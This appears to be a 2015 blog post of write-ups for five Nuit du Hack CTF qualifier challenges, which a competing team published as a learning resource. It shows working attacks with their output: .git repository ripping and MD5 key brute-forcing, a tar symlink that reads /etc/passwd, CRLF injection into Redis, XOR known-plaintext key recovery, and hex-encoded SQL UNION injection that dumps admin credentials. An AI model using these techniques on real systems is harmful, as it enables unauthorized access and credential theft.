CTF NDH Qualifications

Logo NDH

This weekend (4 April 2015) take place the qualification round for "Nuit du Hack" CTF from 00:01 to 23:59. It was a Jeopardy CTF.

I have participated with the Zenk-Security team. At the end we got the 7th position and are qualified for the final which would be a Attack-Defense CTF in Paris in June.

I publish here the ones for the challenges I participated to and make a writeup of. All the writeup for this CTF are accessible here (in french).

This article is a bit long, so here is the list of the available writeup :

Menu:

FaceBox

Web | 100 points | http://quals.nuitduhack.com/challenges/view/10

http://prod.facebox.challs.nuitduhack.com/

Statement

*A shady company decided to write their own software for storing files in the cloud.

"No no no, this is OUR filebox. We decline any responsability in the usage of our filebox. In any event your files get lost, trashed, stolen or spy on : it's your fault, not ours."

You are investigating on the security of their cloud storage as it might have disastrous consequences if it were to get hacked by malicious actors.*

Challenge

The website prod.facebox.challs.nuitduhack.com allow us to create an account and log ourself. Then we can upload files on the server both in public and private mod. In this case the link to the file is hide to the other users.

File Upload

We tried to upload files and execute some code on the server. It was a waste of time. Then we think that if there was a prod, there should also be a dev.

dev

With http://dev.facebox.challs.nuitduhack.com/ we found a git project with the following tree:

http://dev.facebox.challs.nuitduhack.com/.git/config
http://dev.facebox.challs.nuitduhack.com/.git/COMMIT_EDITMSG
http://dev.facebox.challs.nuitduhack.com/.git/HEAD
http://dev.facebox.challs.nuitduhack.com/.git/refs/heads/master
http://dev.facebox.challs.nuitduhack.com/.git/logs/

The page http://dev.facebox.challs.nuitduhack.com/.git/COMMIT_EDITMSG show the last commit messages: hash generation function

We can easily retrieve all files on this repository with rip-git.pl: https://github.com/ctfs/write-ups-2014/tree/master/9447-ctf-2014/tumorous https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-git.pl

A bit of python

With rip-git.pl we found the python script that generate the link of the uploaded files:

#!/usr/bin/env python
# -*- coding: utf-8 -*-


def generate_random_filename(user_id,filename):
    dbuser = users.query.filter_by(id=user_id).first()

    if dbuser.privkey is not None:
        return md5(str(dbuser.privkey)+filename).hexdigest()
    else:
        privkey = str(randint(10000000,99999999))
        upd = users.query.filter_by(id=user_id).first()
        upd.privkey = privkey
        db.session.commit()
    return md5(str(privkey)+filename).hexdigest()

Private file

We have been asked to test the application security. The private file access seems a interesting vulnerability. The first two files were probably upload by the staff. Then we will try to get the confidentials.txt file upload by the user koffi. Hopfuly a second file was upload by this user: paste1.txt at the address http://prod.facebox.challs.nuitduhack.com/files/view/3686d78a6e9d5258773a6ae0469d3ed4

In order to find the private key of the koffi user, we quickly inverse the previous script and we brute force the private key in order to found the good link with the url of the paste1.txt file:

import hashlib

for i in range(10000000,100000000):
        if((i % 10000000) == 0):
                print "%d" % (i)
        if(hashlib.md5(str(i)+"paste01.txt").hexdigest() == "3686d78a6e9d5258773a6ae0469d3ed4"):
                print "privkey found: %d" % (i)

print "Done!"

Result: privkey found: 95594864

With this private key we applied the algorithm to the crendentials.txt file:

import hashlib


def generate_random_filename(user_id,filename):

    privkey = 95594864
    print(hashlib.md5(str(privkey)+filename).hexdigest())

if __name__ == "__main__":
    generate_random_filename("koffi", "confidentials.txt")

Result: 35e2cb0b2e8bd40347ecd4e32767a060

We have the complete url to access the private file: http://prod.facebox.challs.nuitduhack.com/files/view/35e2cb0b2e8bd40347ecd4e32767a060

Flag: M4x_M4i5_DR

FaceSec

Web | 100 points | http://quals.nuitduhack.com/challenges/view/11

http://facesec.challs.nuitduhack.com/

Statement

*"Hello there,

We are looking for a developer or security consultant to secure our filebox system. We stumbled upon your LinkedIn profile and it seems like you would be a perfect candidate for this job. Could you please send us your CV and Motivation letter?

Thanks,

faceSec HR Director."*

Challenge

This challenge allow us to register an account and then upload text file as resume and motivation letter in order to apply for a job. We can also upload a compressed file (tar) with a cv.txt and a motiv.txt in order to upload both files at the same time.

Facebook

This challenge looks like the Facebook vulnerability discover last December: http://josipfranjkovic.blogspot.fr/2014/12/reading-local-files-from-facebooks.html nevertheless we must upload a .tar file instead of a .zip file.

We create a cv.txt file with a symbolic link to /etc/passwd and a motiv.txt file with random content and then tar the two files:

ln -s /etc/passwd cv.txt
echo plop > motiv.txt
tar cvf tar.tar *.txt
    cv.txt
    motiv.txt

We upload the file tar.tar and we get as excepted the /etc/passwd file from the server:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List
Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats
Bug-Reporting System (admin):/var/lib/gnats:/bin/s)
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
facesec:x:1000:1000:W00tSymL1nkAttackStillW0rksIn2k15:/home/facesec:/bin/sh

The flag is the content of the User ID Info of the facesec user.

Flag: W00tSymL1nkAttackStillW0rksIn2k15

SecureAuth

Thank to Spl3en who redacte this writeup before me.

Exploit | 350 points | http://quals.nuitduhack.com/challenges/view/16

Statement

*"There is a building. Inside this building there is a level where no elevator can go, and no stair can reach. This level is filled with doors. These doors lead to many places. Hidden places. But one door is special. One door leads to the source." (The Keymaker)

Find the key. Open the door. Static client @ http://static.challs.nuitduhack.com/SecureAuthClient.tar.gz*

Challenge

The tar.gz file contain the following python program:

import socket
from hashlib import sha256
class SecureConnect_Client():
    def __init__(self):
        self.sock = None
        self.username = None
        self.password = None

    def connect(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect(("151.80.18.93", 4241))

    def login(self, username, password):
        self.username = username
        self.password = password
        challenge = self.get_challenge()
        authpacket = self.process_authpacket(username, password, challenge)
        print "[~] Sending auth packet..."
        self.sock.sendall(authpacket)

    def get_challenge(self):
        data = self.sock.recv(1024)
        if data[:9] == "CHALLENGE":
            print "[~] Server sent challenge : %s !" % data[10:-1]
            return data[10:-1]
        raise Exception("Bad challenge...")

    def process_authpacket(self, username, authtoken, challenge):
        packet = "AUTH %s|%s" % (username, sha256(sha256(authtoken).hexdigest() + challenge).hexdigest())
        print "[+] Auth data : %s" % packet
        return packet

    def get_response(self):
        print self.sock.recv(1024)
        print self.sock.recv(1024)

    def close(self):
        self.sock.close()
if __name__ == "__main__":
    scc = SecureConnect_Client()
    scc.connect()
    scc.login("username", "password")
    scc.get_response()
    scc.close()

We execute the code:

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : gOg0gySNyDbKCKD5oT6SLEdG4fEgkNXntk5uQ1m1XtZzIvMT62bcqMgmB6ei5HVI !
[+] Auth data : AUTH username|7b98c028fc42ee7bc830948b036571f8327279b6929b4f598891ed608edbfbd9
[~] Sending auth packet...
[!] Authentification Error : Invalid username.
[-] Bad password or authentification error... !

admin

By replacing username by admin we got a different message allowing us to think that we got the right user:

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : GRlJD0cTH7RQFPQ5TUNQRQZVmLrxejFNsDPYFF0LWZKvBJLvFwAvN0YDPvU9AMGV !
[+] Auth data : AUTH admin|febb7f8cec097ba5636da95ded1b019030483436385584297bbf64e1bf828acb
[~] Sending auth packet...
[+] Welcome Administrator we are verifying your password...
[-] Bad password or authentification error... !

Errors

Moreover, when playing with the username value, for instance by putting username" we got the following message:

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : uJ2A8UE1WMwYCgWDmOMZSVirPWQoxhWAVeECAwWOVUxXD9q6qqvqGPSpolKr5KX1 !
[+] Auth data : AUTH username'|a932aed6531ebf37074484e10611499007dadd6c42f69649a242302c09245792
[~] Sending auth packet...
[!] Authentification Error : Valid response code but no user data received : -ERR Protocol error: unbalanced quotes in request
[-] Bad password or authentification error... !

Redis

The error unbalanced quotes in request seems to be from a Redis server, a NoSQL engine. We can see this precise error in the networking.c file of the project.

We replace the username with admin\x0A\x0D in order to finish the command and obtain :

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : OFJUOFLbDdR49FHeNMUH4FX7VFIUPxiASDKIaXpZvtIELU3Yo333ICcUmIZFfVWB !
[+] Auth data : AUTH username |e72fd1858578774bfbee00196992db55f7697833746053a2390a73f4616c60da
[~] Sending auth packet...
[+] Welcome -ERR unknown command ':name' we are verifying your password...
[-] Bad password or authentification error... !

We notice the prefix :name which have been interpreted as a second command.

Command injection

We try to inject Redis commands like INFO by replacing the username with admin\x0A\x0DINFO\x0A\x0D:

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : JrLFTYYrDxYibypIBzkdmALAzDCoYe9olBMEZ2OXEDuqsrFFISLzLhWMkeFOdRCB !
[+] Auth data : AUTH admin
INFO
|30247cdea2397657332d6f35b4c2a4340b83e3a842a17119704f31185a41cbe3
[~] Sending auth packet...
[+] Welcome -ERR unknown command 'INFO' we are verifying your password...

[-] Bad password or authentification error... !

The INFO commend is not recognize. After several tests, we see that all commands but GET seems filtrated. We suppose that the one used to get the username and the password in the NoSQL database. With

The requests on the server should be something like:

username = GET <user>:name
password = GET <user>:password

We try to inject admin:password\x0A\x0D in the username, that will give us:

username = GET admin:password\x0A\x0D:name
password = GET admin:password\x0A\x0D:password

(The name and password at the end of each line would not be interpreted).

We execute the program with admin:password\x0A\x0D as a username:

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : DsHn1UJH7LjPSpVOIuZwh7QUgEZ1qGXnK8sHxBYnSTsaWNdVYDvHG5UCPTrvL2AJ !
[+] Auth data : AUTH admin:password
|606611cc808eabd5e38bed8e21360b52127f3e2cecbf02413c3da90fa43c71a3
[~] Sending auth packet...
[+] Welcome 837a135ad3ccb1978f169aa62a62a028b76ec42b2284791bd4703421ec050529 we are verifying your password...

[-] Bad password or authentification error... !

As excepted the server show us the username that we replace by its hashed password. We get the sha256(admin_passwd): 837a135ad3ccb1978f169aa62a62a028b76ec42b2284791bd4703421ec050529.

We replace the corresponding python code to directly send the hash:

packet = "AUTH %s|%s" % (username, sha256(sha256(authtoken).hexdigest() + challenge).hexdigest())

Become:

packet = "AUTH %s|%s" % (username, sha256("837a135ad3ccb1978f169aa62a62a028b76ec42b2284791bd4703421ec050529" + challenge).hexdigest())

We execute the script:

spl3en@box:~$ python SecureAuthClient.py
[~] Server sent challenge : elQQpNHPDlDk1FO9RUiqDfUyUBRpFGMJ5NuBkGTGnGVYW9SCRluSYlcNQnJYkSHP !
[+] Auth data : AUTH admin:password
|8baf1cc43bbe6316ed5959cd8efd2fd8f23d9bae441d4a8134277cd973fcaec4
[~] Sending auth packet...
[+] Welcome 837a135ad3ccb1978f169aa62a62a028b76ec42b2284791bd4703421ec050529 we are verifying your password...

[+] Congrats. The flag is : *INSERT_FUNNY_QUOTE_HERE*

Flag: *INSERT_FUNNY_QUOTE_HERE*

Updator

Exploit | 200 points | http://quals.nuitduhack.com/challenges/view/9

http://updator.challs.nuitduhack.com/

Statement

*Unhackable : "Not hackable; that cannot be hacked or broken into."

We manage updates and thus have fixes, this is not a PS3 as it is unhackable… or is it?*

Challenge

The website is a simple page with a login interface for witch we do not have any credentials and a Update button. When clicking on the button we got the following message from the page http://updator.challs.nuitduhack.com/update.py: The update managing system is still under construction but will be available soon.

robots.txt

The file robots.txt reveal the folder temp/:

Disallow: temp/*

In this folder we found a file log.py.encrypted. How can we decipher it ?

pyc

The Update button call a update.py file therefor we can try for the compiled version of it with the .pyc extension as confirmed by the page http://updator.challs.nuitduhack.com/update.pyc

We must decompile this file, we will use uncompyle2. The output is the following python program:

import config
import sys
KEY = config.KEY

def xor(*args):
    if len(args) < 2:
        sys.exit(0)
    length = len(args[0])
    for arg in args:
        if len(arg) != length:
            sys.exit(0)
        length = len(arg)

    cipher = args[0]
    for arg in args[1:]:
        cipher = ''.join([ chr(ord(arg[i]) ^ ord(cipher[i])) for i in range(len(arg)) ])

    return cipher


class Crypto:

    @staticmethod
    def encrypt(file):
        with open(file, 'r') as fd:
            content = fd.read()
        content = content.ljust(len(content) + (8 - len(content) % 8), '0')
        blocks = [ content[i * 8:(i + 1) * 8] for i in range(len(content) / 8) ]
        with open('%s.encrypted' % file, 'w') as fd:
            encrypted = []
            for i in range(len(blocks)):
                if i == 0:
                    encrypted.append(xor(KEY, blocks[i]))
                else:
                    encrypted.append(xor(KEY, blocks[i], encrypted[i - 1]))

            fd.write(''.join(encrypted))

    @staticmethod
    def decrypt(file):
        with open(file, 'r') as fd:
            content = fd.read()
        blocks = [ content[i * 8:(i + 1) * 8] for i in range(len(content) / 8) ]
        with open('.'.join(file.split('.')[:-1]), 'w') as fd:
            plain = []
            for i in range(len(blocks)):
                if i == 0:
                    plain.append(xor(KEY, blocks[i]))
                else:
                    plain.append(xor(KEY, blocks[i], blocks[i - 1]))

            fd.write(''.join(plain).rstrip('0'))


print 'Content-Type: text/html'
print '\n<!DOCTYPE html>\n<html>\n  <head>\n    <meta charset="UTF-8">\n    <title>Updator - Update system</title>\n    <link rel="stylesheet" href="static/font-awesome/css/font-awesome.css">\n    <link rel="stylesheet" href="static/css/style.css">\n  </head>\n  <body>\n    <div id="info">\n      The update managing system is still under construction but will be available soon.\n    </div>\n  </body>\n</html>\n'
</code>

The private key

We know the algorithm use to encrypt the log.py.encypted file: a XOR cipher by bloc of 8 characters where the preceding bloc is also XOR with the current one. We just need the key. Bruteforcing 8 characters will be too long, we need an other method. The log.py.encypted file being python code will probably start by something like import sys.

First of all lets take a closer look to log.py.encrypted:

[maggick@rootine updator]$ hexdump -C log.py.encrypted
00000000  5f 36 30 0b 03 56 06 17  08 19 15 1b 1b 19 45 6e  |_60..V........En|
00000010  34 0e 1a 38 35 7f 2a 4f  22 68 7a 7b 28 32 6b 4f  |4..85.*O"hz{(2kO|
00000020  33 39 30 7c 35 71 3e 4f  25 2e 1f 7f 23 36 6a 14  |390|5q>O%...#6j.|
00000030  3a 4f 55 11 72 34 6c 47  4c 67 61 14 77 7f 29 59  |:OU.r4lGLga.w.)Y|
00000040  1f 48 49 1f 62 57 2f 0a  09 33 6d 1e 75 55 65 16  |.HI.bW/..3m.uUe.|
00000050  58 40 58 09 61 05 2d 04  03 7e 34 4d 60 46 78 04  |X@X.a.-..~4M`Fx.|
00000060  42 4a 06 4d 38 5e 54 57  54 31 66 09 69 5c 52 46  |BJ.M8^TWT1f.i\RF|
00000070  03 19 43 03 79 13 11 15  08 62 24 42 7b 1e 12 15  |..C.y....b$B{...|
00000080  61 1c 17 01 2a 19 14 4e  1b 08 10 3a 1f 72 60 11  |a...*..N...:.r`.|
00000090  0d 20 24 2c 46 34 27 16  5e 0f 0d 25 52 38 65 04  |. $,F4'.^..%R8e.|
000000a0  1c 31 63 35 4c 7e 22 0e  02 43 0a 7d 1d 29 77 18  |.1c5L~"..C.}.)w.|
000000b0  46 76 2b 74 09 22 5b 4b  50 0d 4b 30 58 20 5d 4f  |Fv+t."[KP.K0X ]O|
000000c0  0f 22 63 74 46 72 1e 52  11 1b 42 63 52 3e 59 4c  |."ctFr.R..BcR>YL|
000000d0  42 6c 22 20 42 37 58 16  54 56 11 64 55 71 44 6f  |Bl" B7X.TV.dUqDo|
000000e0  42 2d 71 20 04 73 42 3c  54 56 11 64 13 35 4a 38  |B-q .sB<TV.d.5J8|
000000f0  10 64 25 65 4a 30 37 6e  55 62 45 4d 54 75 78 73  |.d%eJ07nUbEMTuxs|
00000100  43 4e 6c 5d 4d 77 2e 61  06 66 5b 56 4e 31 28 37  |CNl]Mw.a.f[VN1(7|
00000110  43 61 75 15 1f 36 2e 6c  06 4e 47 59 0a 75 7c 7a  |Cau..6.l.NGY.u|z|
00000120  44 7c 6a 58 55 33 3b 7d  17 53 43 51 41 3f 69 61  |D|jXU3;}.SCQA?ia|
00000130  45 69 7a 1d 19 34 63 32  03 53 49 0a 1f 79 37 25  |Eiz..4c2.SI..y7%|
00000140  1c 21 03 5e 5e 6b 21 66                           |.!.^^k!f|
00000148

XOR being a symmetric algorithm we just need to XOR the first octet of the file with the word import s:

>>> chr(0x5f^ord('i'))
'6'
>>> chr(0x36^ord('m'))
'['
>>> chr(0x30^ord('p'))
'@'
>>> chr(0x0b^ord('o'))
'd'
>>> chr(0x03^ord('r'))
'q'
>>> chr(0x56^ord('t'))
'"'
>>> chr(0x06^ord(' '))
'&'
>>> chr(0x17^ord('s'))
'd'

We decipher the file with the key 6[@dq"&d and obtain the following first line:

import satetime

The first line of our file was not import sys but import datetime.

>>> chr(0x17^ord('d'))
's'

The logs file

We decipher the file with the key 6[@dq"&s and obtain the following file:

import datetime

LOG_DIR = 'logs'

class Logger():

    @staticmethod
    def log(username, password):
        basename = '%s/%s_%s' % (LOG_DIR, str(datetime.date.today()), username)
        with open(basename, 'a+') as fd:
            fd.write('[%s] Login with password %s\n' % (str(datetime.datetime.today()), password))

We see that the logs of the application are in a file like /logs/date_username/ with the date in the format YYYY-MM-DD.

We go to the URL http://updator.challs.nuitduhack.com/logs/2015-04-04_admin to see the logs:

[2015-04-04 18:49:48.839448] Login with password Mpt2P4sse2Ouf
[2015-04-04 18:49:54.044382] Login with password Mot2P4sse2Ouf

We now have the credentials to log ourself in the interface and get the flag.

Flag: zEpbiUFt5p7m84cxOxN6

Raptor

Thank to Plo who redact this WRITUP before me.

Misc \ 400 points http://quals.nuitduhack.com/challenges/view/12

Statement

No statement, nothing except a link: raptor.challs.nuitduhack.com:4142

Challenge

We connect ourself to the port and the address:

[plo@hyperion Misc]$ nc raptor.challs.nuitduhack.com 4142
~ » Welcome to the Raptor/1.0 Information Exchange Server
~ » You are anonymous - Read only access !
Available commands :
+----------+-----------------+-------------------------------+--------------------------------+
| Command  | Required Access |             Syntax            |              Help              |
+----------+-----------------+-------------------------------+--------------------------------+
|   AUTH   |      guest      |    AUTH [login] [password]    |     Connect to an account      |
|   LIST   |       user      |       LIST [maxrecords]       |    List users informations     |
|  SEARCH  |       user      | SEARCH [pattern] [maxresults] |         Search an user         |
|  RSHELL  |      admin      |             RSHELL            |    Migrate to Raptor Shell     |
| VERSION  |      guest      |            VERSION            |  Show current Raptor version   |
| REGISTER |      guest      |            REGISTER           |     Register a new account     |
|   HELP   |      guest      |            VERSION            |      Show this help menu       |
|  RIGHTS  |      guest      |             RIGHTS            |   Print your current rights    |
| HISTORY  |       user      |            HISTORY            |     Show your call history     |
|  RESET   |      guest      |             RESET             | ROLLBACK ! (Reset the CTF DB.) |
|   QUIT   |      guest      |              QUIT             |     Close the connection.      |
+----------+-----------------+-------------------------------+--------------------------------+

We are connected to the Raptor service as guest.

The output format seems to be a database. A SQL request could return this output. The Raptor service got 3 level of rights: guest, user and admin and the only command restricted to the admin right is RSHELL. When continuing to discover the commands, we notice that the _ and % SQL wildcards characters work directly out of the box:

guest ~ $ SEARCH %
+-----------+---------------+-----------+--------+
| FIRSTNAME |    LASTNAME   | DESKPHONE | RIGHTS |
+-----------+---------------+-----------+--------+
|   Wesley  |   Eshmaggle   |    4412   | admin  |
|    Yvan   |    Delacam    |    0452   |  user  |
|    Yvon   |     Payrir    |     A     |  user  |
|   Zlatan  | Ibrahimovitch |    5122   |  user  |
+-----------+---------------+-----------+--------+

guest ~ $ SEARCH _
+-----------+---------------+-----------+--------+
| FIRSTNAME |    LASTNAME   | DESKPHONE | RIGHTS |
+-----------+---------------+-----------+--------+
|   Wesley  |   Eshmaggle   |    4412   | admin  |
|    Yvan   |    Delacam    |    0452   |  user  |
|    Yvon   |     Payrir    |     A     |  user  |
|   Zlatan  | Ibrahimovitch |    5122   |  user  |
+-----------+---------------+-----------+--------+

Moreover, the user Yvon Payrir as a DESKPHONE A. We create an account to check if we can put directly a letter as DESKPHONE:

guest ~ $ REGISTER
Please fill the informations below :

Login : a
Firstname : a
Lastname : a
Contact (DESK PHONE) : TEST
/!\ ERROR ! INVALID DESKPHONE NUMBER !

This is not directly possible, we then used the hexadecimal value of TEST:

guest ~ $ REGISTER
Please fill the informations below :

Login : a
Firstname : a
Lastname : a
Contact (DESK PHONE) : 0x54455354
Password : zenk
Encrypting using 128x(ROT13) ......HAAAAAAAAX......
Password encryption done ! (Security First) !

guest ~ $ SEARCH %
+-----------+---------------+-----------+--------+
| FIRSTNAME |    LASTNAME   | DESKPHONE | RIGHTS |
+-----------+---------------+-----------+--------+
|     a     |       a       |    TEST   |  user  |
|   Wesley  |   Eshmaggle   |    4412   | admin  |
|    Yvan   |    Delacam    |    0452   |  user  |
|    Yvon   |     Payrir    |     A     |  user  |
|   Zlatan  | Ibrahimovitch |    5122   |  user  |
+-----------+---------------+-----------+--------+

(We can notice that the password is "Encrypted" with 128 ROT13 which is plain text as ROT13 is symmetric). We can inject anything in the DESKPHONE filed.

One of the command is HISTORY. This command list the calls history for a given user. The coincidence is great as we can inject data in the DESKPHONE field:

a ~ $ HISTORY
RAPTOR CALL REPORTING
- CLIENT INFO :

+-----------+------+
|  USERNAME |  a   |
|   RIGHTS  | user |
| DESKPHONE | TEST |
+-----------+------+

If we put an existing number as DESKPHONE, the HISTORY command show us the history of an other user. It seems to be a simple SQL injection in hexadecimal. We try to get some informations about the database (the SQL command is in the DESKPHONE filed):

guest ~ $ REGISTER
Please fill the informations below :

Login : d
Firstname : d
Lastname : d
Contact (DESK PHONE) : 0x3120554e494f4e2053454c454354207461626c655f736368656d612c7461626c655f6e616d652c636f6c756d6e5f6e616d652c6e756c6c2046524f4d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73
Password : zenk
Encrypting using 128x(ROT13) ......HAAAAAAAAX......
Password encryption done ! (Security First) !

d ~ $ HISTORY
RAPTOR CALL REPORTING
- CLIENT INFO :

+-----------+-----------------------------------------------------------------------------------------+
|  USERNAME |                                            d                                            |
|   RIGHTS  |                                           user                                          |
| DESKPHONE | 1 UNION SELECT table_schema,table_name,column_name,null FROM information_schema.columns |
+-----------+-----------------------------------------------------------------------------------------+

 - CALL HISTORY

+--------------------+---------------------------------------+----------------------------------+----------+
|         ID         |                  DATE                 |           DESTINATION            | DURATION |
+--------------------+---------------------------------------+----------------------------------+----------+
| information_schema |             CHARACTER_SETS            |        CHARACTER_SET_NAME        |   None   |
| [...]              |             [...]                     |        [...]                     |   None   |
|    x_8816665166    |                 users                 |                id                |   None   |
|    x_8816665166    |                 users                 |            firstname             |   None   |
|    x_8816665166    |                 users                 |               name               |   None   |
|    x_8816665166    |                 users                 |             contact              |   None   |
|    x_8816665166    |                 users                 |             password             |   None   |
|    x_8816665166    |                 users                 |              login               |   None   |
|    x_8816665166    |                 users                 |              rights              |   None   |
+--------------------+---------------------------------------+----------------------------------+----------+

We get the admin password:

guest ~ $ REGISTER
Please fill the informations below :

Login : i
Firstname : i
Lastname : i
Contact (DESK PHONE) : 0x3120554e494f4e2053454c454354206c6f67696e2c70617373776f72642c7269676874732c6e756c6c2046524f4d207573657273205748455245207269676874733d2761646d696e27
Password : i
Encrypting using 128x(ROT13) ......HAAAAAAAAX......
Password encryption done ! (Security First) !

i ~ $ HISTORY
RAPTOR CALL REPORTING
- CLIENT INFO :

+-----------+---------------------------------------------------------------------------+
|  USERNAME |                                     i                                     |
|   RIGHTS  |                                    user                                   |
| DESKPHONE | 1 UNION SELECT login,password,rights,null FROM users WHERE rights='admin' |
+-----------+---------------------------------------------------------------------------+

 - CALL HISTORY

+-------------+------------+-------------+----------+
|      ID     |    DATE    | DESTINATION | DURATION |
+-------------+------------+-------------+----------+
| w.eshmaggle | Hanlbatard |    admin    |   None   |
+-------------+------------+-------------+----------+

We login as the admin user and user the RSHELL command:

guest ~ $ AUTH w.eshmaggle Hanlbatard
Welcome w.eshmaggle !
w.eshmaggle ~ $ RSHELL
Ok, ok good job. You are admin... The flag is : 0eb80d9c2cdee95b461cf0b70d40791f

Flag: 0eb80d9c2cdee95b461cf0b70d40791f